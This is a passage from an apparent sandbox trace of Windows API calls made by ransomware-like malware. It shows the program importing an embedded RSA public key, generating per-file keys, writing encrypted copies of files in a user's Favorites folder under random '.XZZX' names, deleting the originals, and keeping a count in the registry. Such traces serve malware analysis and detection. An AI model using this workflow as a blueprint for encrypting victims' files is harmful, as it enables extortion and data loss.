lpDistanceToMoveHigh=0x0) returned 0x6b [0045.187] WriteFile (in: hFile=0x540, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0045.187] SetFilePointer (in: hFile=0x540, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x70 [0045.187] SetErrorMode (uMode=0x1) returned 0x1 [0045.187] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0045.187] OutputDebugStringW (lpOutputString="end") [0045.187] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0045.187] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0045.187] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x42d5868) returned 1 [0045.188] CryptImportPublicKeyInfo (in: hCryptProv=0x42d5868, dwCertEncodingType=0x1, pInfo=0x3e400c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e400f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e400f8*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x42e5d50) returned 1 [0045.188] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0045.189] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0045.189] CryptEncrypt (in: hKey=0x42e5d50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0045.189] CryptEncrypt (in: hKey=0x42e5d50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x42d58f0*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x42d58f0*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0045.189] WriteFile (in: hFile=0x540, lpBuffer=0x42d58f0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42d58f0*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0045.189] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0045.189] WriteFile (in: hFile=0x540, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0045.189] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0045.189] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0045.189] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x54c) returned 0x0 [0045.190] RegQueryValueExW (in: hKey=0x54c, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x3e, lpcbData=0x417dfdc*=0x4) returned 0x0 [0045.190] RegCloseKey (hKey=0x54c) returned 0x0 [0045.190] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x54c) returned 0x0 [0045.190] RegSetValueExW (in: hKey=0x54c, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x3f, cbData=0x4 | out: lpData=0x417dfec*=0x3f) returned 0x0 [0045.190] RegCloseKey (hKey=0x54c) returned 0x0 [0045.190] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0045.190] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0045.190] CloseHandle (hObject=0x540) returned 1 [0045.191] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0045.192] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0045.192] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini")) returned 1 [0045.192] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini")) returned 0 Thread: id = 158 os_tid = 0x990 [0045.237] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0045.237] lstrcpyW (in: lpString1=0x417f460, lpString2="Suggested Sites.url" | out: lpString1="Suggested Sites.url") returned="Suggested Sites.url" [0045.237] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0045.237] SetErrorMode (uMode=0x1) returned 0x1 [0045.237] lstrcpyW (in: lpString1=0x417f860, lpString2="Suggested Sites.url" | out: lpString1="Suggested Sites.url") returned="Suggested Sites.url" [0045.237] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0x6ea48c8c, Data2=0x1402, Data3=0x4581, Data4=([0]=0xb8, [1]=0x3f, [2]=0x3, [3]=0xf7, [4]=0x70, [5]=0xfb, [6]=0x59, [7]=0xb8))) returned 0x0 [0045.237] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned 69 [0045.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0045.237] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\B8440918056E9F026EA48C8C0986834A.XZZX") returned 87 [0045.238] StrStrW (lpFirst="Suggested Sites.url", lpSrch="XZZX") returned 0x0 [0045.238] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url", dwFileAttributes=0x20) returned 1 [0045.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x548 [0045.240] ReadFile (in: hFile=0x548, lpBuffer=0x3e27d78, nNumberOfBytesToRead=0xec, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x3e27d78*, lpNumberOfBytesRead=0x417e418*=0xec, lpOverlapped=0x0) returned 1 [0045.240] CloseHandle (hObject=0x548) returned 1 [0045.240] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0045.241] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0045.241] SetErrorMode (uMode=0x1) returned 0x1 [0045.241] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0045.241] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x42d5978) returned 1 [0045.244] CryptGenKey (in: hProv=0x42d5978, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e53d0) returned 1 [0045.382] CryptExportKey (in: hKey=0x42e53d0, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0045.382] CryptExportKey (in: hKey=0x42e53d0, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0045.382] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0045.383] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0045.383] CryptDestroyKey (hKey=0x42e53d0) returned 1 [0045.383] CryptReleaseContext (hProv=0x42d5978, dwFlags=0x0) returned 1 [0045.383] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\B8440918056E9F026EA48C8C0986834A.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\b8440918056e9f026ea48c8c0986834a.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x548 [0045.383] WriteFile (in: hFile=0x548, lpBuffer=0x3e27d78*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x3e27d78*, lpNumberOfBytesWritten=0x417e438*=0xec, lpOverlapped=0x0) returned 1 [0045.384] SetFilePointer (in: hFile=0x548, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xec [0045.384] WriteFile (in: hFile=0x548, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0045.384] SetFilePointer (in: hFile=0x548, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xf1 [0045.384] WriteFile (in: hFile=0x548, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x26, lpOverlapped=0x0) returned 1 [0045.384] SetFilePointer (in: hFile=0x548, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x117 [0045.384] WriteFile (in: hFile=0x548, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0045.384] SetFilePointer (in: hFile=0x548, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x11c [0045.384] SetErrorMode (uMode=0x1) returned 0x1 [0045.384] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0045.384] OutputDebugStringW (lpOutputString="end") [0045.385] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0045.385] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0045.385] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x42d5978) returned 1 [0045.385] CryptImportPublicKeyInfo (in: hCryptProv=0x42d5978, dwCertEncodingType=0x1, pInfo=0x3e40190*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e401c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e401c8*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x42e5d90) returned 1 [0045.385] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0045.386] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0045.386] CryptEncrypt (in: hKey=0x42e5d90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0045.386] CryptEncrypt (in: hKey=0x42e5d90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x42d5a00*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x42d5a00*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0045.386] WriteFile (in: hFile=0x548, lpBuffer=0x42d5a00*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42d5a00*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0045.386] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0045.386] WriteFile (in: hFile=0x548, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0045.386] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0045.387] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0045.387] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x550) returned 0x0 [0045.387] RegQueryValueExW (in: hKey=0x550, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x3f, lpcbData=0x417dfdc*=0x4) returned 0x0 [0045.387] RegCloseKey (hKey=0x550) returned 0x0 [0045.387] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x550) returned 0x0 [0045.387] RegSetValueExW (in: hKey=0x550, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x40, cbData=0x4 | out: lpData=0x417dfec*=0x40) returned 0x0 [0045.387] RegCloseKey (hKey=0x550) returned 0x0 [0045.387] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0045.387] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0045.388] CloseHandle (hObject=0x548) returned 1 [0045.388] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0045.389] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0045.389] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url")) returned 1 [0045.390] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url")) returned 0 Thread: id = 159 os_tid = 0x98c [0045.393] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0045.393] lstrcpyW (in: lpString1=0x417f460, lpString2="Web Slice Gallery.url" | out: lpString1="Web Slice Gallery.url") returned="Web Slice Gallery.url" [0045.393] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0045.393] SetErrorMode (uMode=0x1) returned 0x1 [0045.393] lstrcpyW (in: lpString1=0x417f860, lpString2="Web Slice Gallery.url" | out: lpString1="Web Slice Gallery.url") returned="Web Slice Gallery.url" [0045.393] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0x4ed7a99b, Data2=0x553c, Data3=0x4b36, Data4=([0]=0xa7, [1]=0x3, [2]=0x16, [3]=0x8d, [4]=0x1, [5]=0xd3, [6]=0x25, [7]=0xa7))) returned 0x0 [0045.393] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned 71 [0045.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0045.393] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\15DC3754190A8EA84ED7A99B1D2272F0.XZZX") returned 87 [0045.393] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch="XZZX") returned 0x0 [0045.393] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url", dwFileAttributes=0x20) returned 1 [0045.394] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54c [0045.394] ReadFile (in: hFile=0x54c, lpBuffer=0x42d2060, nNumberOfBytesToRead=0xe2, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x42d2060*, lpNumberOfBytesRead=0x417e418*=0xe2, lpOverlapped=0x0) returned 1 [0045.394] CloseHandle (hObject=0x54c) returned 1 [0045.394] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0045.395] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0045.395] SetErrorMode (uMode=0x1) returned 0x1 [0045.395] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0045.395] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x42d5a88) returned 1 [0045.398] CryptGenKey (in: hProv=0x42d5a88, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e53d0) returned 1 [0045.599] CryptExportKey (in: hKey=0x42e53d0, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0045.599] CryptExportKey (in: hKey=0x42e53d0, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0045.599] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0045.599] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0045.599] CryptDestroyKey (hKey=0x42e53d0) returned 1 [0045.599] CryptReleaseContext (hProv=0x42d5a88, dwFlags=0x0) returned 1 [0045.599] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\15DC3754190A8EA84ED7A99B1D2272F0.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\15dc3754190a8ea84ed7a99b1d2272f0.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x558 [0045.600] WriteFile (in: hFile=0x558, lpBuffer=0x42d2060*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42d2060*, lpNumberOfBytesWritten=0x417e438*=0xe2, lpOverlapped=0x0) returned 1 [0045.600] SetFilePointer (in: hFile=0x558, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0045.600] WriteFile (in: hFile=0x558, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0045.600] SetFilePointer (in: hFile=0x558, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe7 [0045.600] WriteFile (in: hFile=0x558, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x2a, lpOverlapped=0x0) returned 1 [0045.600] SetFilePointer (in: hFile=0x558, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x111 [0045.600] WriteFile (in: hFile=0x558, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, 